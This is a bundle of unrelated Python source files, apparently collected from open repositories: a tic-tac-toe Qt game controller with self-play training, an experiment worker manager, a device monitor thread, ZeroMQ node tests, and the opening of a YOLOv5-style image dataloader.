        self.player1 = Player("pl", 1)         # the computer, nought by default
        self.player1.load_policy(const.POLICY1)
        self.machine = None                    # Machine is (re)built in setup()
        self.game_type = ""
        self.disabled_action = True  # disable ability to click on board
        self.t = None  # thread
        self.mode = -1                         # 1: human moves first, -1: computer first

    def setup(self):
        """(Re)create the game engine wired to the view callbacks."""
        self.view.statusbar.showMessage(self.game_type)
        self.machine = Machine(self.player1,
                               self.player2,
                               self.computer_action,
                               self.show_winner_nodes,
                               self.update_score)

    def new_game(self):
        """Start a human-vs-computer match on a fresh worker thread."""
        if threading.active_count() > 1:  # it prevents from clicking many times button 'new game'
            return                        # and creating too many useless threads
        self.game_type = const.GAME_TYPE_1
        self.disabled_action = False
        # After training, player2 was replaced by a computer Player; restore
        # a human player.  NOTE(review): assumes HumanPlayer is not a Player
        # subclass, otherwise this always triggers -- confirm in player.py.
        if isinstance(self.player2, Player):
            self.player2 = HumanPlayer("p2", self.mode)
        if self.t is not None and self.t.stopped() is False:
            self.t.stop()
        self.clean_board()
        self.setup()
        self.t = StoppableThread(target=self.start_human_vs_comp, reset=self.machine.set_end)
        self.t.daemon = True  # kill this thread when main thread is killed
        self.t.start()

    def comp_vs_comp(self):
        """Start a computer-vs-computer exhibition match."""
        if threading.active_count() > 1:
            return
        self.game_type = const.GAME_TYPE_2
        self.disabled_action = True
        self.change_to_cross(None)
        self.player2 = Player("p2", -1)
        self.player2.load_policy(const.POLICY2)  # load second computer player
        self.clean_board()
        if self.t is not None and self.t.stopped() is False:
            self.t.stop()
        self.setup()
        self.t = StoppableThread(target=self.start_comp_vs_comp, reset=self.machine.set_end)
        self.t.daemon = True  # kill this thread when main thread is killed
        self.t.start()

    def training(self):
        """Start self-play training with two fresh computer players."""
        if self.game_type == const.GAME_TYPE_3:
            return
        self.game_type = const.GAME_TYPE_3
        self.disabled_action = True
        self.player2 = Player("p_training2", -1)
        self.player1 = Player("p_training1", 1)
        self.clean_board()
        self.reset_score()
        if self.t is not None and self.t.stopped() is False:
            self.t.stop()
        self.setup()
        self.t = StoppableThread(target=self.start_training, reset=self.machine.set_end)
        self.t.daemon = True
        self.t.start()

    def start_training(self):
        """Thread body: play 5000 self-play games, persist both policies."""
        self.isTraining = True
        self.machine.play(5000)
        self.player1.save_policy()
        self.player2.save_policy()
        self.new_game()
        self.isTraining = False

    def start_human_vs_comp(self):
        """Thread body: pick the engine loop based on who moves first."""
        if self.mode != 1:
            self.machine.play2()
        else:
            self.machine.play4()

    def start_comp_vs_comp(self):
        """Thread body for the computer-vs-computer loop."""
        self.machine.play3()

    def show_winner_nodes(self, switch: int, pos: int = 0):
        """Highlight the winning line; board is a flat list of 9 cells.

        switch selects the line type, pos the row/column index.
        """
        if switch == 0:  # row
            for i in range(3):
                self.view.board[pos * 3 + i].mark_as_winner()
        elif switch == 1:  # column
            for i in range(3):
                self.view.board[i * 3 + pos].mark_as_winner()
        elif switch == 2:  # diagonal \
            for i in range(3):
                self.view.board[i * 4].mark_as_winner()        # cells 0, 4, 8
        elif switch == 3:  # diagonal /
            for i in range(3):
                self.view.board[(i + 1) * 2].mark_as_winner()  # cells 2, 4, 6

    def show(self):
        """Create the Qt application and block in its event loop."""
        app = QtWidgets.QApplication(sys.argv)
        app.setWindowIcon(QtGui.QIcon('graphic/icon.ico'))
        MainWindow = QtWidgets.QMainWindow()
        self.view.setupUi(MainWindow)
        MainWindow.show()
        sys.exit(app.exec_())

    def update_score(self, winner):
        """Engine callback: tally the result (1=nought, -1=cross, else tie)."""
        self.disabled_action = True  # disable ability to click on board after match is finished
        # Map players to their current symbols (they can swap via change_to_*).
        if self.player2.symbol == 1:
            nought = self.player2
            cross = self.player1
        else:
            cross = self.player2
            nought = self.player1
        if winner == 1:
            nought.score += 1
            self.view.circle_score.setText(str(nought.score))
            self.view.statusbar.showMessage("Nought win!")
        elif winner == -1:
            cross.score += 1
            self.view.cross_score.setText(str(cross.score))
            self.view.statusbar.showMessage("Cross win!")
        else:
            self.view.statusbar.showMessage("Tie!")
        self.games += 1
        self.view.games_label.setText(str(self.games))

    def computer_action(self, action, symbol: int):
        """Engine callback: draw the computer's (row, col) move on the board."""
        a = int(action[0])
        b = int(action[1])
        index = a * 3 + b
        self.view.board[index].action(symbol)

    def action(self, i_node: int):
        """View callback: human clicked board cell ``i_node``."""
        if self.disabled_action:
            return
        self.view.board[i_node].action(self.player2.symbol)
        self.player2.click(i_node)

    def clean_board(self):
        """Clear all 9 cells."""
        for node in self.view.board:
            node.reset()

    def reset_score(self):
        """Zero both score labels and the game counter."""
        self.view.circle_score.setText("0")
        self.view.cross_score.setText("0")
        self.games = 0
        self.view.games_label.setText(str(self.games))

    def change_to_circle(self, event):
        """Human play first"""
        if self.isTraining: return  # don't allow to change who play first during training
        if self.player2.symbol == 1: return  # already circle
        self.mode = 1
        self.player2.symbol = 1  # change human player's letter to circle
        self.player1.symbol = -1
        self.player1.load_policy(const.POLICY2)  # policy trained for the second mover
        self.view.statusbar.showMessage("You play circle")

    def change_to_cross(self, event):
        """Computer play first"""
        if self.isTraining: return  # don't allow to change who play first during training
        if self.player2.symbol == -1: return  # already cross
        self.mode = -1
        self.player2.symbol = -1
        self.player1.symbol = 1
        self.player1.load_policy(const.POLICY1)
        self.view.statusbar.showMessage("You play cross")

    def exit(self):
        """Terminate the application."""
        exit()
class StoppableThread(threading.Thread):
    """Thread with a cooperative stop flag and a reset hook.

    ``stop()`` first invokes the supplied ``reset`` callable (used to tell the
    game machine to finish its loop) and then raises an internal flag that the
    owner can poll through ``stopped()``.
    """

    def __init__(self, target, reset):
        super(StoppableThread, self).__init__(target=target)
        self.reset = reset
        self._stop_event = threading.Event()

    def stop(self):
        """Ask the thread to finish: run the reset hook, then set the flag."""
        self.reset()
        self._stop_event.set()

    def stopped(self):
        """Return True once stop() has been called."""
        return self._stop_event.is_set()
|
worker_manager.py | """
A manager for multiple workers.
-- kandasamy@cs.cmu.edu
"""
# pylint: disable=invalid-name
# pylint: disable=abstract-class-not-used
# pylint: disable=abstract-class-little-used
from __future__ import print_function
from __future__ import division
from argparse import Namespace
from multiprocessing import Process
import numpy as np
import os
try:
from sets import Set
except ImportError:
Set = set
import shutil
import time
# Local
from .exd_utils import EVAL_ERROR_CODE
_TIME_TOL = 1e-5
class WorkerManager(object):
    """ A Base class for a worker manager. """

    def __init__(self, worker_ids):
        """ Constructor.

        ``worker_ids`` may be an iterable of ids or an integer count (in which
        case ids 0..n-1 are generated).
        """
        if hasattr(worker_ids, '__iter__'):
            self.worker_ids = worker_ids
        else:
            self.worker_ids = list(range(worker_ids))
        self.num_workers = len(self.worker_ids)
        # These will be set in reset
        self.experiment_designer = None
        self.latest_results = None
        # Reset
        self.reset()

    def reset(self):
        """ Resets everything. """
        self.experiment_designer = None
        self.latest_results = []  # A list of namespaces
        self._child_reset()

    def _child_reset(self):
        """ Child reset. """
        raise NotImplementedError('Implement in a child class.')

    def fetch_latest_results(self):
        """ Returns results whose receive time has already elapsed; keeps the rest. """
        cutoff = self.experiment_designer.get_curr_spent_capital() + _TIME_TOL
        ready = [res for res in self.latest_results if res.receive_time <= cutoff]
        self.latest_results = [res for res in self.latest_results
                               if res.receive_time > cutoff]
        return ready

    def close_all_queries(self):
        """ Closes all queries. """
        raise NotImplementedError('Implement in a child class.')

    def set_experiment_designer(self, experiment_designer):
        """ Set the experiment designer. """
        self.experiment_designer = experiment_designer

    def a_worker_is_free(self):
        """ Returns true if a worker is free. """
        raise NotImplementedError('Implement in a child class.')

    def all_workers_are_free(self):
        """ Returns true if all workers are free. """
        raise NotImplementedError('Implement in a child class.')

    def _dispatch_experiment(self, func_caller, qinfo, **kwargs):
        """ Dispatches job. """
        raise NotImplementedError('Implement in a child class.')

    def dispatch_single_experiment(self, func_caller, qinfo, **kwargs):
        """ Dispatches job. """
        raise NotImplementedError('Implement in a child class.')

    def dispatch_batch_of_experiments(self, func_caller, qinfos, **kwargs):
        """ Dispatches an entire batch of experiments. """
        raise NotImplementedError('Implement in a child class.')

    def get_time_distro_info(self):
        """ Returns information on the time distribution. """
        #pylint: disable=no-self-use
        return ''

    def get_poll_time_real(self):
        """ Returns the poll time. """
        raise NotImplementedError('Implement in a child class.')
# A synthetic worker manager - for simulating multiple workers ---------------------------
class SyntheticWorkerManager(WorkerManager):
    """ A Worker manager for synthetic functions. Mostly to be used in simulations. """

    def __init__(self, num_workers, time_distro='const', time_distro_params=None):
        """ Constructor. """
        self.worker_pipe = None
        super(SyntheticWorkerManager, self).__init__(num_workers)
        # Set up the sampler for simulated evaluation times.
        self.time_distro = time_distro
        self.time_distro_params = time_distro_params
        self.time_sampler = None
        self._set_up_time_sampler()

    def _set_up_time_sampler(self):
        """ Set up the sampler for the time random variable. """
        if self.time_distro_params is None:
            self.time_distro_params = Namespace()
        params = self.time_distro_params
        if self.time_distro == 'caller_eval_cost':
            # The function caller reports its own evaluation cost.
            pass
        elif self.time_distro == 'const':
            if not hasattr(params, 'const_val'):
                params.const_val = 1
            self.time_sampler = lambda num_samples: (np.ones((num_samples,)) *
                                                     params.const_val)
        elif self.time_distro == 'uniform':
            if not hasattr(params, 'ub'):
                params.ub = 2.0
                params.lb = 0.0
            ub = params.ub
            lb = params.lb
            self.time_sampler = lambda num_samples: (np.random.random((num_samples,)) *
                                                     (ub - lb) + lb)
        elif self.time_distro == 'halfnormal':
            if not hasattr(params, 'ub'):
                params.sigma = np.sqrt(np.pi / 2)
            self.time_sampler = lambda num_samples: np.abs(np.random.normal(
                scale=params.sigma, size=(num_samples,)))
        else:
            raise NotImplementedError('Not implemented time_distro = %s yet.' % (
                self.time_distro))

    def _child_reset(self):
        """ Child reset: each pipe entry is [worker_id, time_when_free]. """
        self.worker_pipe = [[wid, 0.0] for wid in self.worker_ids]

    def sort_worker_pipe(self):
        """ Sorts worker pipe by finish time. """
        self.worker_pipe.sort(key=lambda entry: entry[-1])

    def a_worker_is_free(self):
        """ Returns the earliest free time (always 'free' as this is synthetic). """
        return self.worker_pipe[0][-1]

    def all_workers_are_free(self):
        """ Returns the latest free time (always 'free' as this is synthetic). """
        return self.worker_pipe[-1][-1]

    def close_all_queries(self):
        """ Close all queries. """
        pass

    def _dispatch_experiment(self, func_caller, qinfo, worker_id, **kwargs):
        """ Dispatch experiment and simulate its receive time. """
        qinfo.worker_id = worker_id  # indicate which worker
        qinfo = func_caller.eval_from_qinfo(qinfo, **kwargs)
        if self.time_distro == 'caller_eval_cost':
            qinfo.eval_time = qinfo.caller_eval_cost
        else:
            qinfo.eval_time = float(self.time_sampler(1))
        qinfo.receive_time = qinfo.send_time + qinfo.eval_time
        # Store the result in latest_results
        self.latest_results.append(qinfo)
        return qinfo

    def dispatch_single_experiment(self, func_caller, qinfo, **kwargs):
        """ Dispatch a single experiment on the first-free worker. """
        first_free = self.worker_pipe[0]
        qinfo = self._dispatch_experiment(func_caller, qinfo, first_free[0], **kwargs)
        first_free[-1] = qinfo.receive_time
        self.sort_worker_pipe()

    def dispatch_batch_of_experiments(self, func_caller, qinfos, **kwargs):
        """ Dispatches an entire batch of experiments, one per worker. """
        assert len(qinfos) == self.num_workers
        for pipe_entry, qinfo in zip(self.worker_pipe, qinfos):
            dispatched = self._dispatch_experiment(func_caller, qinfo,
                                                   pipe_entry[0], **kwargs)
            pipe_entry[-1] = dispatched.receive_time
        self.sort_worker_pipe()

    def get_time_distro_info(self):
        """ Returns information on the time distribution. """
        return self.time_distro

    def get_poll_time_real(self):
        """ Return 0.0 as the poll time. """
        return 0.0
# Real worker manager - for simulating multiple workers --------------------------------
class RealWorkerManager(WorkerManager):
    """ A worker manager for real, file/process-based workers.

    Each worker gets a result directory and a working directory under
    ``tmp_dir``.  An experiment runs in a separate ``Process`` that is
    expected to write its outcome to ``result.txt`` in the worker's result
    directory; the worker is considered free once that file appears.
    """
    # pylint: disable=attribute-defined-outside-init

    def __init__(self, worker_ids, tmp_dir,
                 poll_time=0.5, sleep_time_after_new_process=0.5):
        """ Constructor. """
        super(RealWorkerManager, self).__init__(worker_ids)
        self.poll_time = poll_time
        self.sleep_time_after_new_process = sleep_time_after_new_process
        self.tmp_dir = tmp_dir
        self._rwm_set_up()
        self._child_reset()

    def _rwm_set_up(self):
        """ Sets up directories and bookkeeping for the workers. """
        # Create the result directories.
        self.result_dir_names = {wid: '%s/result_%s' % (self.tmp_dir, str(wid))
                                 for wid in self.worker_ids}
        # Create the working directories
        self.working_dir_names = {wid: '%s/working_%s/tmp' % (self.tmp_dir, str(wid))
                                  for wid in self.worker_ids}
        # Create the last receive times
        self.last_receive_times = {wid: 0.0 for wid in self.worker_ids}
        # Create file names
        self._result_file_name = 'result.txt'
        self._num_file_read_attempts = 10
        # self._file_read_poll_time = 0.5 # wait for 0.5 seconds

    @classmethod
    def _delete_dirs(cls, list_of_dir_names):
        """ Deletes a list of directories. """
        for dir_name in list_of_dir_names:
            if os.path.exists(dir_name):
                shutil.rmtree(dir_name)

    @classmethod
    def _delete_and_create_dirs(cls, list_of_dir_names):
        """ Deletes a list of directories and creates new ones. """
        for dir_name in list_of_dir_names:
            if os.path.exists(dir_name):
                shutil.rmtree(dir_name)
            os.makedirs(dir_name)

    def _child_reset(self):
        """ Resets child: wipe directories, mark all workers free. """
        # Delete/create the result and working directories.
        if not hasattr(self, 'result_dir_names'):  # Just for the super constructor.
            return
        self._delete_and_create_dirs(self.result_dir_names.values())
        self._delete_dirs(self.working_dir_names.values())
        self.free_workers = Set(self.worker_ids)
        self.qinfos_in_progress = {wid: None for wid in self.worker_ids}
        self.worker_processes = {wid: None for wid in self.worker_ids}

    def _get_result_file_name_for_worker(self, worker_id):
        """ Computes the result file name for the worker. """
        return os.path.join(self.result_dir_names[worker_id], self._result_file_name)

    def _read_result_from_file(self, result_file_name):
        """ Reads the result from the file name.

        Retries up to ``self._num_file_read_attempts`` times (the worker may
        still be writing the file), returning EVAL_ERROR_CODE if every attempt
        fails.  BUGFIX: the attempt counter was never incremented before, so a
        persistent read error spun forever; the except path could also hit an
        unbound ``file_reader`` when open() itself failed.
        """
        for _ in range(self._num_file_read_attempts):
            try:
                with open(result_file_name, 'r') as file_reader:
                    read_in = file_reader.read().strip()
                try:
                    # try converting to float. If not successful, it is likely an error string.
                    read_in = float(read_in)
                except ValueError:
                    pass
                return read_in
            except Exception:
                # File may be mid-write or momentarily locked -- wait and retry.
                print('Encountered error when reading %s. Trying again.' % (result_file_name))
                time.sleep(self.poll_time)
        return EVAL_ERROR_CODE

    def _read_result_from_worker_and_update(self, worker_id):
        """ Reads the result from the worker and marks it free again. """
        # Read the file
        result_file_name = self._get_result_file_name_for_worker(worker_id)
        val = self._read_result_from_file(result_file_name)
        # Now update the relevant qinfo and put it to latest_results
        qinfo = self.qinfos_in_progress[worker_id]
        qinfo.val = val
        qinfo.receive_time = self.experiment_designer.get_curr_spent_capital()
        qinfo.eval_time = qinfo.receive_time - qinfo.send_time
        if not hasattr(qinfo, 'true_val'):
            qinfo.true_val = val
        self.latest_results.append(qinfo)
        # Update receive time
        self.last_receive_times[worker_id] = qinfo.receive_time
        # Delete the file.
        os.remove(result_file_name)
        # Delete content in a working directory.
        shutil.rmtree(self.working_dir_names[worker_id])
        # Add the worker to the list of free workers and clear qinfos in progress.
        self.worker_processes[worker_id].terminate()
        self.worker_processes[worker_id] = None
        self.qinfos_in_progress[worker_id] = None
        self.free_workers.add(worker_id)

    def _worker_is_free(self, worker_id):
        """ Checks if worker with worker_id is free; harvests a finished result. """
        if worker_id in self.free_workers:
            return True
        worker_result_file_name = self._get_result_file_name_for_worker(worker_id)
        if os.path.exists(worker_result_file_name):
            # The worker just finished: collect its result and report it free.
            self._read_result_from_worker_and_update(worker_id)
            # BUGFIX: previously fell through and returned None here, so a
            # just-finished worker was reported busy until the next poll.
            return True
        return False

    def _get_last_receive_time(self):
        """ Returns the last time we received a job. """
        all_receive_times = self.last_receive_times.values()
        return max(all_receive_times)

    def a_worker_is_free(self):
        """ Returns the last receive time if any worker is free, else None. """
        for wid in self.worker_ids:
            if self._worker_is_free(wid):
                return self._get_last_receive_time()
        return None

    def all_workers_are_free(self):
        """ Returns the last receive time if all workers are free, else None. """
        all_are_free = True
        for wid in self.worker_ids:
            # Deliberately polls every worker (harvesting finished results),
            # not just until the first busy one.
            all_are_free = self._worker_is_free(wid) and all_are_free
        if all_are_free:
            return self._get_last_receive_time()
        else:
            return None

    def _dispatch_experiment(self, func_caller, qinfo, worker_id, **kwargs):
        """ Dispatches experiment to worker_id in a new process. """
        #pylint: disable=star-args
        if self.qinfos_in_progress[worker_id] is not None:
            err_msg = 'qinfos_in_progress: %s,\nfree_workers: %s.' % (
                str(self.qinfos_in_progress), str(self.free_workers))
            print(err_msg)
            raise ValueError('Check if worker is free before sending experiment.')
        # First add all the data to qinfo
        qinfo.worker_id = worker_id
        qinfo.working_dir = self.working_dir_names[worker_id]
        qinfo.result_file = self._get_result_file_name_for_worker(worker_id)
        # Create the working directory
        os.makedirs(qinfo.working_dir)
        # Dispatch the experiment in a new process
        target_func = lambda: func_caller.eval_from_qinfo(qinfo, **kwargs)
        self.worker_processes[worker_id] = Process(target=target_func)
        self.worker_processes[worker_id].start()
        time.sleep(self.sleep_time_after_new_process)
        # Add the qinfo to the in progress bar and remove from free_workers
        self.qinfos_in_progress[worker_id] = qinfo
        self.free_workers.discard(worker_id)

    def dispatch_single_experiment(self, func_caller, qinfo, **kwargs):
        """ Dispatches a single experiment to a free worker. """
        worker_id = self.free_workers.pop()
        self._dispatch_experiment(func_caller, qinfo, worker_id, **kwargs)

    def dispatch_batch_of_experiments(self, func_caller, qinfos, **kwargs):
        """ Dispatches a batch of experiments, one per worker. """
        assert len(qinfos) == self.num_workers
        for idx in range(self.num_workers):
            self._dispatch_experiment(func_caller, qinfos[idx], self.worker_ids[idx], **kwargs)

    def close_all_queries(self):
        """ Closes all queries. """
        pass

    def get_time_distro_info(self):
        """ Returns information on the time distribution. """
        return 'realtime'

    def get_poll_time_real(self):
        """ Returns the poll time. """
        return self.poll_time
# Some APIs
def get_default_worker_manager():
    """ Return Synthetic worker manager. """
    # One synthetic worker with a constant (unit) simulated evaluation time.
    return SyntheticWorkerManager(1, time_distro='const')
|
monitor.py | from .reader.device_reader import DeviceReader
import threading
import time
import queue
class BasicMonitor:
    """Polls a device via ``reader`` on a background thread and pushes
    protobuf snapshots onto ``proto_que`` every ``interval`` seconds.
    """

    def __init__(self, reader, proto_que=None, interval=0.5):
        """
        Args:
            reader: a DeviceReader used to produce protobuf snapshots.
            proto_que: queue-like object with a callable ``put``; a fresh
                ``queue.Queue`` is created when omitted.  (BUGFIX: the old
                ``proto_que=queue.Queue()`` default was a single queue shared
                by every BasicMonitor instance -- the classic mutable default
                argument pitfall.)
            interval: seconds between matrix refreshes.

        Raises:
            TypeError: if ``reader`` is not a DeviceReader, or ``proto_que``
                has no callable ``put``.
        """
        if not isinstance(reader, DeviceReader):
            raise TypeError(f'reader should be a type of DeviceReader, get {type(reader)}.')
        if proto_que is None:
            proto_que = queue.Queue()
        if not hasattr(proto_que, 'put') or not callable(proto_que.put):
            raise TypeError('proto_que should has callable put attribute.')
        self.reader = reader
        self.stop_event = threading.Event()
        self.proto_que = proto_que
        self.interval = interval
        self._thd = threading.Thread(target=self.monitor)
        # Full snapshot (basic + matrix); the monitor loop only refreshes the
        # matrix part of this cached proto.
        self.proto = self.get_proto(basic_info=True, matrix_info=True)

    def get_proto(self, **kwargs):
        """Delegate protobuf serialization to the reader."""
        proto = self.reader.to_proto(**kwargs)
        return proto

    def monitor(self):
        """Worker loop: every ``interval`` seconds refresh the matrix and
        enqueue the snapshot, until ``stop()`` is called.

        BUGFIX: the original compared against a start timestamp that was never
        reset, so after the first interval it busy-looped and flooded the
        queue with a put per iteration.  ``Event.wait(interval)`` both paces
        the loop and reacts promptly to ``stop()``.
        """
        while not self.stop_event.wait(self.interval):
            proto = self.get_proto(basic_info=False, matrix_info=True)
            self.proto.matrix.CopyFrom(proto.matrix)
            self.proto_que.put(self.proto)

    def start(self):
        """Start the background monitoring thread."""
        self.stop_event.clear()
        self._thd.start()

    def stop(self):
        """Signal the monitor loop to stop and wait for the thread to exit."""
        self.stop_event.set()
        self._thd.join()
|
test_node.py | import time
from threading import Thread
from typing import Any, Dict
import pytest
from pabiana.utils import Interfaces
from pabiana.zmqs.node import Node
interfaces = {} # type: Interfaces
subscriptions = {} # type: Dict[str, Any]
@pytest.fixture(scope='module', autouse=True)
def setup():
    """Populate the module-level interface/subscription tables once."""
    iface_config = {
        'test-pub': {'ip': '127.0.0.1', 'port': 8279},
        'test-rcv': {'ip': '127.0.0.1', 'port': 8280},
        'area1-pub': {'ip': '130.0.0.2', 'port': 8281},
        'area1-rcv': {'ip': '130.0.0.2', 'port': 8282},
        'area2-pub': {'ip': '130.0.0.2', 'port': 8283, 'host': '0.0.0.0'},
        'area2-rcv': {'ip': '130.0.0.2', 'port': 8284}
    }
    sub_config = {
        'area1': {'slots': ['area1-slot1', 'area1-slot2']},
        'area2': {'slots': None, 'buffer-length': 100}
    }
    interfaces.update(iface_config)
    subscriptions.update(sub_config)
def test_run_stop():
    """Node.run() must return once stop() is requested from another thread."""
    class TestNode(Node): pass
    TestNode.__abstractmethods__ = set()

    def stop(value):
        # Give run() time to enter its loop before requesting shutdown.
        time.sleep(0.5)
        value.stop()

    node = TestNode(name='area2', interfaces=interfaces)
    t = Thread(target=stop, args=(node,))
    t.start()
    node.run(timeout=0, linger=0)
    # Join to avoid a race where run() returns before the stopper thread
    # finishes.  BUGFIX: Thread.isAlive() was removed in Python 3.9; use
    # is_alive().
    t.join(timeout=5)
    assert not t.is_alive()
def test_setup_run_stop():
    """Same as test_run_stop, but with subscriptions set up before run()."""
    class TestNode(Node): pass
    TestNode.__abstractmethods__ = set()

    def stop(value):
        # Give run() time to enter its loop before requesting shutdown.
        time.sleep(0.5)
        value.stop()

    node = TestNode(name='area2', interfaces=interfaces)
    node.setup(puller=False, subscriptions=subscriptions)
    t = Thread(target=stop, args=(node,))
    t.start()
    node.run(timeout=0, linger=0)
    # Join to avoid a race where run() returns before the stopper thread
    # finishes.  BUGFIX: Thread.isAlive() was removed in Python 3.9; use
    # is_alive().
    t.join(timeout=5)
    assert not t.is_alive()
|
datasets.py | # Dataset utils and dataloaders
import glob
import logging
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
import torch.nn.functional as F
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.general import xyxy2xywh, xywh2xyxy, xywhn2xyxy, xyn2xy, segment2box, segments2boxes, resample_segments, \
clean_str
from utils.torch_utils import torch_distributed_zero_first
# Parameters
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng', 'webp']  # acceptable image suffixes
vid_formats = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv']  # acceptable video suffixes
logger = logging.getLogger(__name__)

# Get orientation exif tag
# After this loop `orientation` holds the numeric EXIF tag id whose name is
# 'Orientation'; it is used by exif_size() below.
for orientation in ExifTags.TAGS.keys():
    if ExifTags.TAGS[orientation] == 'Orientation':
        break
def get_hash(files):
    # Single "hash" for a list of files: the total size of all existing paths.
    sizes = (os.path.getsize(path) for path in files if os.path.isfile(path))
    return sum(sizes)
def exif_size(img):
    """Return the EXIF-corrected PIL size (width, height).

    Swaps width/height when the EXIF Orientation tag says the pixels are
    stored rotated by 90 or 270 degrees; falls back to the raw size when the
    image has no usable EXIF data.
    """
    s = img.size  # (width, height)
    try:
        rotation = dict(img._getexif().items())[orientation]
        # 6 -> rotated 270, 8 -> rotated 90; both require swapping w/h.
        if rotation in (6, 8):
            s = (s[1], s[0])
    except Exception:
        # Was a bare `except:`; no/invalid EXIF keeps the reported size but we
        # no longer swallow SystemExit/KeyboardInterrupt.
        pass
    return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
                      rank=-1, world_size=1, workers=8, image_weights=False, quad=False, prefix=''):
    """Build a LoadImagesAndLabels dataset and a matching dataloader.

    Args:
        path: image directory / list file accepted by LoadImagesAndLabels.
        imgsz: target (square) image size in pixels.
        batch_size: requested batch size (capped at dataset length).
        stride: model stride used for letterbox padding.
        opt: options namespace; only ``opt.single_cls`` is read here.
        hyp: augmentation hyperparameter dict.
        rank: DDP rank; -1 means no distributed sampling.
        world_size: number of DDP processes (divides CPU workers).
    Returns:
        (dataloader, dataset) tuple.
    """
    # Make sure only the first process in DDP process the dataset first, and the following others can use the cache
    with torch_distributed_zero_first(rank):
        dataset = LoadImagesAndLabels(path, imgsz, batch_size,
                                      augment=augment,  # augment images
                                      hyp=hyp,  # augmentation hyperparameters
                                      rect=rect,  # rectangular training
                                      cache_images=cache,
                                      single_cls=opt.single_cls,
                                      stride=int(stride),
                                      pad=pad,
                                      image_weights=image_weights,
                                      prefix=prefix)

    batch_size = min(batch_size, len(dataset))
    nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers])  # number of workers
    sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
    loader = torch.utils.data.DataLoader if image_weights else InfiniteDataLoader
    # Use torch.utils.data.DataLoader() if dataset.properties will update during training else InfiniteDataLoader()
    dataloader = loader(dataset,
                        batch_size=batch_size,
                        num_workers=nw,
                        sampler=sampler,
                        pin_memory=True,
                        collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
    return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
    """ Dataloader that reuses workers

    Uses same syntax as vanilla DataLoader
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # DataLoader forbids reassigning batch_sampler after construction,
        # hence the object.__setattr__ bypass to wrap it in a repeating one.
        object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
        # A single persistent iterator keeps the worker processes alive
        # across epochs.
        self.iterator = super().__iter__()

    def __len__(self):
        # Length of one epoch, delegated to the underlying sampler.
        return len(self.batch_sampler.sampler)

    def __iter__(self):
        # Yield exactly one epoch's worth of batches from the endless iterator.
        for i in range(len(self)):
            yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages:  # for inference
    """Iterator over image/video files for inference.

    Yields (path, letterboxed CHW RGB image, original BGR image, VideoCapture
    or None) per frame.  Videos are consumed frame by frame before moving to
    the next file.
    """

    def __init__(self, path, img_size=640, stride=32):
        p = str(Path(path).absolute())  # os-agnostic absolute path
        if '*' in p:
            files = sorted(glob.glob(p, recursive=True))  # glob
        elif os.path.isdir(p):
            files = sorted(glob.glob(os.path.join(p, '*.*')))  # dir
        elif os.path.isfile(p):
            files = [p]  # files
        else:
            raise Exception(f'ERROR: {p} does not exist')

        # Split by extension into images and videos.
        images = [x for x in files if x.split('.')[-1].lower() in img_formats]
        videos = [x for x in files if x.split('.')[-1].lower() in vid_formats]
        ni, nv = len(images), len(videos)

        self.img_size = img_size
        self.stride = stride
        self.files = images + videos
        self.nf = ni + nv  # number of files
        self.video_flag = [False] * ni + [True] * nv
        self.mode = 'image'
        if any(videos):
            self.new_video(videos[0])  # new video
        else:
            self.cap = None
        assert self.nf > 0, f'No images or videos found in {p}. ' \
                            f'Supported formats are:\nimages: {img_formats}\nvideos: {vid_formats}'

    def __iter__(self):
        self.count = 0
        return self

    def __next__(self):
        if self.count == self.nf:
            raise StopIteration
        path = self.files[self.count]

        if self.video_flag[self.count]:
            # Read video
            self.mode = 'video'
            ret_val, img0 = self.cap.read()
            if not ret_val:
                # Current video exhausted: advance to the next file.
                self.count += 1
                self.cap.release()
                if self.count == self.nf:  # last video
                    raise StopIteration
                else:
                    path = self.files[self.count]
                    self.new_video(path)
                    ret_val, img0 = self.cap.read()

            self.frame += 1
            print(f'video {self.count + 1}/{self.nf} ({self.frame}/{self.nframes}) {path}: ', end='')

        else:
            # Read image
            self.count += 1
            img0 = cv2.imread(path)  # BGR
            assert img0 is not None, 'Image Not Found ' + path
            print(f'image {self.count}/{self.nf} {path}: ', end='')

        # Padded resize
        img = letterbox(img0, self.img_size, stride=self.stride)[0]

        # Convert
        img = img[:, :, ::-1].transpose(2, 0, 1)  # BGR to RGB, to 3x416x416
        img = np.ascontiguousarray(img)

        return path, img, img0, self.cap

    def new_video(self, path):
        # Open the next video and reset per-video frame bookkeeping.
        self.frame = 0
        self.cap = cv2.VideoCapture(path)
        self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))

    def __len__(self):
        return self.nf  # number of files
class LoadWebcam:  # for inference
    """Endless iterator over frames from a local webcam or an IP-camera URL.

    Yields ('webcam.jpg', letterboxed CHW RGB image, original BGR frame, None);
    press 'q' in an OpenCV window to stop.
    """

    def __init__(self, pipe='0', img_size=640, stride=32):
        self.img_size = img_size
        self.stride = stride

        if pipe.isnumeric():
            pipe = eval(pipe)  # local camera
        # pipe = 'rtsp://192.168.1.64/1'  # IP camera
        # pipe = 'rtsp://username:password@192.168.1.64/1'  # IP camera with login
        # pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg'  # IP golf camera

        self.pipe = pipe
        self.cap = cv2.VideoCapture(pipe)  # video capture object
        self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3)  # set buffer size

    def __iter__(self):
        self.count = -1
        return self

    def __next__(self):
        self.count += 1
